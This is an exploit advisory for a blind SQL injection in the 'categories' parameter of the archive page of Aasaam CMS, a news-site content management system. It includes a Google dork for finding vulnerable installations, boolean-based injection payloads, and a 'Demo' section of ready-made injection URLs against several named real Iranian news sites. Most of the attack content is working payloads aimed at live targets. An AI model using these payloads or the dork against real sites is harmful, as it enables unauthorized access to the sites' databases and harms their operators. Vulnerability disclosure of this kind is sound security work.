[-] Exploit Title: Aasaam Cms Blind SQL Injection Vulnerability [-] Vendor Homepage : https://aasaam.com [-] Google Dork: intext:"سامانه خبری آسام" [-] Author : Milad Ahmadi [-] Date : 30.October.2017 [-] Version: All [-] Tested on Windows 10 --------------------------------------------------------------------- [ Description ] # Aasaam Cms "Contet management system" is one of the most popular cms for building news sites lot of Iranian with this management system like Donya-E-Eqtesad , Ilna News, Jamaran news, Borna News and etc. This management system is vulnerable to blind sql injection vulnerability in archive page with category parameter. --------------------------------------------------------------------- [ Poc ] http://site.com/newsstudios/archive/?categories=-[ID] AND 8*8=1 http://site.com/newsstudios/archive/?categories=-[ID] AND 8*8=64 --------------------------------------------------------------------- [ Demo ] http://www.jamaran.ir/newsstudios/archive/?categories=-1%20AND%208*8=64 http://www.jamaran.ir/newsstudios/archive/?categories=-1%20AND%208*8=1 http://www.ilna.ir//newsstudios/archive/?categories=-1%20AND%208*8=1 http://www.ilna.ir//newsstudios/archive/?categories=-1%20AND%208*8=64 http://www.bornanews.ir/newsstudios/archive/?categories=-1%20AND%208*8=1 http://www.bornanews.ir/newsstudios/archive/?categories=-1%20AND%208*8=64 --------------------------------------------------------------------- Thanks To: All GuardIran Security Team Members Discovered By: Milad Ahmadi